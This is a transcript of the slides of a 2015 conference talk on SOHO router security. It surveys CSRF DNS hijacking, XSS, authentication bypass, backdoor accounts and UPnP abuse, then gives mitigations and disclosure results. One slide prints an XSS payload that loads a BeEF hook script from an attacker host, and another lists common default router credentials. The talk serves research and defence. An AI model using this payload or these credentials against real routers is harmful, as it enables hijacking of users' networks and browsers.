soho routers: swords and shields cybercamp 2015
TRANSCRIPT
![Page 1: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/1.jpg)
![Page 2: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/2.jpg)
Swords & ShieldsSOHO Routers:
Álvaro Folgado, José Antonio Rodríguez, Iván Sanz
![Page 3: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/3.jpg)
3
About us…
Meet our research groupÁlvaro Folgado RuedaIndependent Researcher
José Antonio Rodríguez GarcíaIndependent Researcher
Iván Sanz de CastroSecurity Analyst at Wise Security Global.
![Page 4: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/4.jpg)
4
The talk
Mitigations
Vulnerabilities & Attacks
Keys
![Page 5: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/5.jpg)
5
Real World Attacks Example 1 – Dictionary for DNS Hijacking via CSRF
![Page 6: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/6.jpg)
6
Real World Attacks Example 2 – Phishing website
![Page 7: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/7.jpg)
7
Real World Attacks Example 3 – Linux/Moose Malware
![Page 8: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/8.jpg)
8
Common security problems Services
Too many. Mostly useless.□ Increases attack surfaces
Insecure
![Page 9: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/9.jpg)
9
Common security problems Default credentials
Public and well-known for each model Non randomly generated Hardly ever modified by users
45%
27%
5%
5%
18% User / Password1234 / 1234
admin / admin
[blank] / admin
admin / password
vodafone / vodafone
![Page 10: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/10.jpg)
10
Common security problems Multiple user accounts
Also with public default credentials Mostly useless for users Almost always hidden for end-users
□ Passwords for these accounts are never changed
![Page 11: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/11.jpg)
11
Swords
![Page 12: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/12.jpg)
12
Bypass Authentication Allows unauthenticated attackers to carry out router
configuration changes Locally and remotely Exploits:
Improper file permissions: Web configuration interface Service misconfiguration: SMB and Twonky Media Server
Persistent DoS / Restore router to default settings without requiring authentication
Exploiting the Twonky Media Server
Video Demos #1 & #2
![Page 13: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/13.jpg)
13
Cross Site Request Forgery Change any router configuration settings by sending
a specific malicious link to the victim Main goal
DNS Hijacking Requires embedding login credentials in the
malicious URL Attack feasible if credentials have never been changed Google Chrome does not pop-up warning
![Page 14: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/14.jpg)
14
Cross Site Request Forgery Suspicious link, isn't it?
URL Shortening Services Create a malicious website
![Page 15: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/15.jpg)
15
Persistent Cross Site Scripting Inject malicious script code within the web
configuration interface Goals
Session Hijacking Browser Infection
![Page 16: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/16.jpg)
16
Persistent Cross Site Scripting Browser Exploitation Framework is a great help
Input field character length limitation BeEF hooks link to a more complex script file hosted by the
attackerhttp://1234:[email protected]/goform?param=<script
src="http://NoIPDomain:3000/hook.js"></script>
![Page 17: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/17.jpg)
17
Unauthenticated Cross Site Scripting Script code injection is performed locally without
requiring any login process Send a DHCP Request PDU containing the malicious
script within the hostname parameter The malicious script is injected within Connected
Clients (DHCP Leases) table
![Page 18: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/18.jpg)
18
Unauthenticated Cross Site Scripting
![Page 19: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/19.jpg)
19
Unauthenticated Cross Site Scripting Always try harder
![Page 20: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/20.jpg)
20
Privilege Escalation User without administrator rights is able to escalate
privileges and become an administrator Shows why multiple user accounts are unsafe
Privilege Escalation via FTP
Video Demo #3
![Page 21: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/21.jpg)
21
Backdoor Hidden administrator accounts Completely invisible to end users
But allows attackers to change any configuration setting
![Page 22: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/22.jpg)
22
Information Disclosure Obtain critical information without requiring any
login process WLAN password Detailed list of currently connected clients Hints about router's administrative password Other critical configuration settings
![Page 23: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/23.jpg)
23
Information Disclosure
![Page 24: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/24.jpg)
24
Universal Plug and Play Enabled by default on several router models Allows application to execute network configuration
changes such as opening ports Extremely insecure protocol
Lack of an authentication process Awful implementations
Main goals Open critical ports for remote WAN hosts Persistent Denial of Service Carry out other configuration changes
![Page 25: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/25.jpg)
25
Universal Plug and Play Locally
Miranda UPnP tool
![Page 26: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/26.jpg)
26
Universal Plug and Play Remotely
Malicious SWF file
![Page 27: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/27.jpg)
27
Attack vectors Locally
Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly
Remotely The attacker is outside of the victim's LAN
![Page 28: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/28.jpg)
28
Social Engineering is your friend For link-based remote attacks
XSS, CSRF and UPnP Social Networks = Build the easiest botnet ever! Phishing emails = Targeted attacks
![Page 29: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/29.jpg)
29
DNS Hijacking via CSRF
Live Demo #1
Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #2
Reflected XSS + client-side attack to get Reverse Shell
Live Demo #3
Bypass Authentication using SMB Symlinks
Live Demo #4
![Page 30: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/30.jpg)
30
Using a Reflected Cross Site Scripting to get a Reverse Shell on victim's computer Exploits an Internet Explorer client-side vulnerability:
CVE-2012-1876
Live Demo #3: Details
![Page 31: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/31.jpg)
31
Shields
![Page 32: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/32.jpg)
32
Mitigations: End users Users start with a broken shield
Limited configuration settings Several attacks cannot be stopped Mitigations only work for specific models
Not as easy as buying a brand new router No antivirus is going to protect you
![Page 33: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/33.jpg)
33
Mitigations: End users Where to start?
Identify your router model Look for router credentials Get into the advanced configuration interface
![Page 34: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/34.jpg)
34
Mitigations: End users General recommendations
Only log into the web interface when needed□ Logout (if possible) / Wipe browser's cache after finishing
Change your router's administrative password
![Page 35: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/35.jpg)
35
Mitigations: End users General recommendations
Check your DNS servers on a weekly basis
![Page 36: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/36.jpg)
36
Mitigations: End users General recommendations
Do not trust shortened links Be careful when browsing the web interface
![Page 37: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/37.jpg)
37
Mitigations: End users Multiple user accounts
Try to delete any other administrative account At least, change their passwords, if possible
![Page 38: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/38.jpg)
38
Video Demo #4 Mitigating Privilege Escalation and
account-related attacks
![Page 39: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/39.jpg)
39
Mitigations: End users Services
Disable any unused service if given the chance□ FTP and SMB□ Media Servers: Twonky□ UPnP□ If local risk, DHCP
It does not always work…
![Page 40: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/40.jpg)
40
Mitigations: End users Firmware
Update to the latest version□ Manufacturer might have not fixed any issues
How?
![Page 41: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/41.jpg)
41
Mitigations: End users Custom Firmware Images
For advanced users More configuration settings Might have security flaws as well
![Page 42: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/42.jpg)
42
Mitigations: Manufacturers Listen to what security researchers have to say Do not include useless services
Specially for ISP SOHO routers At least, make it feasible to completely shut them down
Critical ports closed to WAN by default At least 21, 22, 23, 80 and 8000/8080
![Page 43: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/43.jpg)
43
Mitigations: Manufacturers Do not include multiple user accounts Design a safer alternative to UPnP Avoid using unsafe protocols
HTTP. Telnet. FTP. HTTPS. SSH. SFTP. Randomly generate user credentials
Admin Password
Serial Number
MAC Address
Manufact. Date
![Page 44: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/44.jpg)
44
Mitigations: Manufacturers XSS
Check every input field within router's web interface Sanitize DHCP hostname parameters Content Security Policies
![Page 45: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/45.jpg)
45
Mitigations: Manufacturers CSRF
Tokens… that work
![Page 46: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/46.jpg)
46
Mitigations: Manufacturers Bypass Authentication & Information Disclosure
Check for improper file permissions and public debug messages
Service-related Check for possible wrong service configuration (e.g.: FTP,
SMB)
![Page 47: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/47.jpg)
47
Keys
![Page 48: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/48.jpg)
48
Developed tools
![Page 49: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/49.jpg)
49
Manufacturers' response Average 2-3 emails sent to each manufacturer
Most of them unreplied... 7 months later Number of vulnerabilities fixed: 0
![Page 50: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/50.jpg)
50
Responsible Disclosure
![Page 51: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/51.jpg)
51
Results More than 60 vulnerabilities have been discovered 22 router models affected 11 manufacturers affected
![Page 52: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/52.jpg)
52
Amper
Astoria
Belkin
Comtrend
D-Link
Huawei
Links
ys
Netgear
Observa
T.
Sagemco
mZyx
el 0
2
4
6
8
10
12
14
16
18
Disclosed vulnerabilities per manufac-turer
Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers
![Page 53: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/53.jpg)
53
21%
15%
20%8%
2%
3%
2%
6%
23%
XSS
Unauthenticated XSS
CSRF
Denial of Service
Privilege Escalation
Information Disclosure
Backdoor
Bypass Authentication
UPnP
Vulnerabilities by types
![Page 54: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/54.jpg)
54
Conclusion Has SOHO router security
improved? Hell NO! Serious security problems Easy to exploit With huge impact Millions of users affected
PLEASE, START FIXING SOHO ROUTER SECURITY
![Page 55: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/55.jpg)
55
Álvaro Folgado Rueda · [email protected]é A. Rodríguez García · [email protected]
Iván Sanz de Castro · [email protected]
Thank you!Q&A Time
![Page 56: Soho routers: swords and shields CyberCamp 2015](https://reader035.vdocuments.us/reader035/viewer/2022062523/58ed935c1a28ab4e718b4571/html5/thumbnails/56.jpg)
https://cybercamp.es @CyberCampEs#CyberCamp15